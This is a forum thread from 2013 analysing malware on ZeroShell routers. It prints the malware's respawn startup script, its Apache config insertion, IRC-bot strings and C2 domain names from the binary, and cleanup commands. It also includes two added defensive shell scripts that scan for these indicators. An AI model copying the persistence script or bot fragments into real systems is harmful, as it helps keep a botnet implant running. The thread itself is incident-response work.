ZeroShell forum, Network Management: DoS on DNS Zeroshell: Malware!
November 6, 2013 at 3:50 pm #43775
fsala (Member)
Hi all,
I found a malware on one of our ZS boards that creates a DoS on the Zeroshell DNS with 20k connections to it. Full analysis on the Italian board (sorry, Italian only, I'll translate it in a while...): http://www.zeroshell.net/forum/viewtopic.php?t=4115
November 6, 2013 at 3:59 pm #52997
fsala (Member)
In short:
The issue is a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS.
File attributes are set to hide it and make deletion harder.
root@zeroshell DB> ls -al
total 131252
drwxr-xr-x  4 root root      4096 Oct 21 17:09 .
drwxr-xr-x 21 root root       520 Nov  6 12:55 ..
-rwxr-xr-x  1 root root     23289 Nov 21  2012 .DB.001
drwxr-xr-x  7 root root      4096 Jul  2  2012 _DB.001
drwx------  2 root root     16384 Apr 20  2011 lost+found
-rw-r--r--  1 root root 134217728 Apr 20  2011 swap-file
root@zeroshell DB> lsattr .DB.001
-u--ia .DB.001
To deactivate/rename it:
killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware
I analyzed the activity with "strace": there are thousands of connections to the DNS with queries for "zeroshell.will.mx" and "zeroshell.samhan.biz", and the binary contains code to open an IRC connection (like a lot of worms).
The executable is started at boot from the "Database Update" script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.
# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
    cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
    httpd=$(pidof httpd);kill -HUP $httpd
fi
# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
    /DB/.DB.001
fi
echo "OK"
It also changes the SSL configuration of Apache:
# C100-Security-Fix-beta12
SSLOptions +StdEnvVars
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* - [F]
The binary payload contains these kinds of strings (IRC connection, browser emulation...), so I'm sure it's malware:
zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost
At the moment, I don't know what the infection entry point was, but I suspect a bug in the OpenSSL library or in that area...
Hope it helps!
Fabrizio Sala/Netdream
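The indicators above (hidden binary, embedded C2 names, the Apache marker and the respawn script) can be checked in one pass. The script below is an added example written for this thread; it is not code from the post or from ZeroShell. Paths and strings are the ones the post names; that the Startup/Cron scripts live under /Database/var/register/system is an assumption, and the tree built by make_fixture is constructed sample data, not a real capture.

```shell
#!/bin/sh
# Added example (not from the thread or from ZeroShell): offline indicator
# scan for the .DB.001 infection described in the post.
# Usage: sh zs_ioc.sh /            on a live box
#        sh zs_ioc.sh /mnt/image   against a mounted disk image
#        sh zs_ioc.sh              no argument: run against a constructed fixture
IOC_HOSTS="zeroshell.will.mx zeroshell.samhan.biz"
MARKER="C100-Security-Fix-beta12"

# scan_zs_malware ROOT: print one line per indicator; the return value is the
# number of indicators found, so 0 means clean.
scan_zs_malware() {
    root="${1%/}"; hits=0
    bin="$root/DB/.DB.001"
    if [ -f "$bin" ]; then
        echo "IOC hidden executable: $bin"; hits=$((hits + 1))
        # grep -a reads the binary as text, which is what the strings dump showed
        for h in $IOC_HOSTS; do
            grep -aq "$h" "$bin" && { echo "IOC C2 name in binary: $h"; hits=$((hits + 1)); }
        done
    fi
    ssl="$root/etc/httpd/ssl.conf"
    if [ -f "$ssl" ] && grep -q "$MARKER" "$ssl"; then
        echo "IOC Apache marker $MARKER in $ssl"; hits=$((hits + 1))
    fi
    reg="$root/Database/var/register/system"    # assumed home of the Startup/Cron scripts
    if [ -d "$reg" ]; then
        # the respawn loop: any script that checks "pidof .DB.001" and restarts it
        for f in $(grep -rl 'pidof \.DB\.001' "$reg" 2>/dev/null); do
            echo "IOC respawn script: $f"; hits=$((hits + 1))
        done
    fi
    return $hits
}

# check_attrs FILE: the i/a/u flags are what make a plain "rm" fail on the
# binary; report them when lsattr is available (ext2/3/4 only).
check_attrs() {
    command -v lsattr >/dev/null 2>&1 || return 1
    flags=$(lsattr "$1" 2>/dev/null | cut -d' ' -f1)
    case "$flags" in
        *i*|*a*|*u*) echo "attrs $flags on $1"; return 0 ;;
        *) return 1 ;;
    esac
}

# neutralize_zs_malware ROOT: the cleanup sequence from the post, for a live
# system (needs root; not run by the demo). The respawn entry in the
# Startup/Cron script and the Apache marker block still have to be removed by hand.
neutralize_zs_malware() {
    root="${1%/}"; bin="$root/DB/.DB.001"
    [ -f "$bin" ] || return 0
    killall -9 .DB.001 2>/dev/null
    chattr -iua "$bin" && mv "$bin" "$root/DB/DB-malware"
}

# make_fixture: build a constructed infected tree and print its path
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/DB" "$d/etc/httpd" "$d/Database/var/register/system/startup"
    printf 'NICK %%s\nzeroshell.will.mx\nzeroshell.samhan.biz\n' > "$d/DB/.DB.001"
    printf '# %s\nSSLOptions +StdEnvVars\n' "$MARKER" > "$d/etc/httpd/ssl.conf"
    printf 'Database=$(pidof .DB.001)\nif [ -z "$Database" ]; then\n  /DB/.DB.001\nfi\n' \
        > "$d/Database/var/register/system/startup/dbupdate.sh"
    echo "$d"
}

if [ -n "${1:-}" ]; then
    scan_zs_malware "$1" || echo "$? indicator(s) found under $1"
    check_attrs "$1/DB/.DB.001"
else
    fx=$(make_fixture)
    scan_zs_malware "$fx" || echo "fixture: $? indicator(s) found"
    rm -rf "$fx"
fi
```

Against the constructed fixture the scan reports five indicators; on a real box the same checks cover everything the post lists except the process itself, which pidof .DB.001 or pstree shows directly.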
December 5, 2013 at 1:34 pm #52998
bbozo (Member)
ZS 1 b16
ZS 2 rc2
Almost all my routers (4 of 5) were infected. Is there going to be some kind of patch?
fsala thank you!!!!
January 9, 2014 at 8:13 pm #52999
jpJxPhOuhvqc (Participant)
I've found one of my installations infected with this too.
Can we try and narrow down what we have in common to work out the infection method?
I am running Release 2.0.RC2, set up and running since circa 17/02/2013.
I have (open to the world):
- Port 80 (the web interface)
- Port 443 (the web interface)
- Some LAN-to-LAN (OpenVPN) connections.
-rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
Yet other installations have not been infected.
OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked), running for about a year.
OK Installation 2 = Release 2.0.RC2 / No ports open to the world, running for about 2 months.
OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world, running for about a year.
Both the hosts referenced in the copy I have are the same as the OP's:
zeroshell.will.mx
and
zeroshell.samhan.biz
Luckily both of these don't resolve, and given the date on the infection I presume this must be a very, very old infection that we've only just discovered.
root@zeroshell DB> pstree -Gp
init(1)─┬─.DB.001(14049)
root@zeroshell DB> ps aux | grep 14049
root      7832  0.0  0.0  1944  244 pts/0  S  03:33  0:00 grep 14049
root     14049  0.0  0.2  2036  640 ?      S  2013 64:09 sleep 1800
I killed and reloaded the process and it spawned two of itself and instantly tries to resolve zeroshell.will.mx and zeroshell.samhan.biz.
I forced my network to respond with an IP and the infection then tries to contact zeroshell.will.mx on port 53 using TCP, speaking the IRC protocol:
NICK WORO
USER DCRK localhost localhost :VQYJWO
Tom – http://www.mouselike.org
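Since the bot's first move after (re)start is to resolve the two C2 names, and the original report was a flood of 20k queries against the box's own resolver, the infected hosts on a network can be picked out of the DNS server's query log. The script below is an added example for this thread, not code from the posts or from ZeroShell. The log lines in sample_log are constructed for the example, in the classic BIND 9 "client IP#port: query: NAME IN A ..." format (the newer "client @0x... IP#port (NAME): query:" variant is handled too); that ZeroShell's resolver logs in that format is an assumption.

```shell
#!/bin/sh
# Added example (not from the thread or from ZeroShell): find resolver clients
# that query the two C2 names seen in the .DB.001 binary, from a BIND-style
# query log. Usage: c2_query_counts [LOGFILE]  (stdin if no file is given)
IOC_NAMES="zeroshell.will.mx zeroshell.samhan.biz"

# c2_query_counts [LOGFILE]: print "<client-ip> <count>" for every client
# that asked for one of the C2 names at least once, sorted by client.
c2_query_counts() {
    awk -v iocs="$IOC_NAMES" '
    BEGIN { n = split(iocs, list, " "); for (k = 1; k <= n; k++) ioc[list[k]] = 1 }
    {
        ip = ""; q = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "client") {
                j = i + 1
                if ($j ~ /^@/) j++          # BIND >= 9.11 inserts a client pointer here
                split($j, a, "#"); ip = a[1]
            }
            if ($i == "query:") q = tolower($(i + 1))
        }
        sub(/\.$/, "", q)                   # drop a trailing dot if the name is FQDN-form
        if (ip != "" && (q in ioc)) count[ip]++
    }
    END { for (c in count) print c, count[c] }' "$@" | sort
}

# flag_c2_clients THRESHOLD [LOGFILE]: clients at or above THRESHOLD C2 queries.
# A single query is enough to be interesting; the DoS in the post was ~20k.
flag_c2_clients() {
    thr="$1"; shift
    c2_query_counts "$@" | awk -v t="$thr" '$2 >= t { print $1 }'
}

# sample_log: constructed query-log lines (sample data, not a real capture).
# 192.0.2.10 is the infected host, 192.0.2.11 asked once, 192.0.2.12 is clean.
sample_log() {
    cat <<'EOF'
06-Nov-2013 12:55:01.101 client 192.0.2.10#40001: query: zeroshell.will.mx IN A + (192.0.2.1)
06-Nov-2013 12:55:01.102 client 192.0.2.10#40002: query: zeroshell.samhan.biz IN A + (192.0.2.1)
06-Nov-2013 12:55:01.103 client 192.0.2.10#40003: query: zeroshell.will.mx IN A + (192.0.2.1)
06-Nov-2013 12:55:01.104 client 192.0.2.10#40004: query: ZEROSHELL.WILL.MX. IN A + (192.0.2.1)
06-Nov-2013 12:55:01.105 client 192.0.2.10#40005: query: zeroshell.samhan.biz IN A + (192.0.2.1)
06-Nov-2013 12:55:02.200 client 192.0.2.11#51000: query: www.zeroshell.net IN A + (192.0.2.1)
06-Nov-2013 12:55:02.201 client @0x7f3c2c0 192.0.2.11#51001 (zeroshell.will.mx): query: zeroshell.will.mx IN A + (192.0.2.1)
06-Nov-2013 12:55:03.300 client 192.0.2.12#22000: query: pool.ntp.org IN A + (192.0.2.1)
EOF
}

# Demo against the constructed log; on a real box feed the resolver's query log.
echo "C2 queries per client:"
sample_log | c2_query_counts
echo "clients at or above 3 queries:"
sample_log | flag_c2_clients 3
```

The client list this produces is the set of hosts to run the filesystem checks on; because the bot also falls back to TCP/53 to the resolved address, a sinkhole answer for the two names (what the post above did by hand) turns the same lookups into a connection you can see in the firewall log.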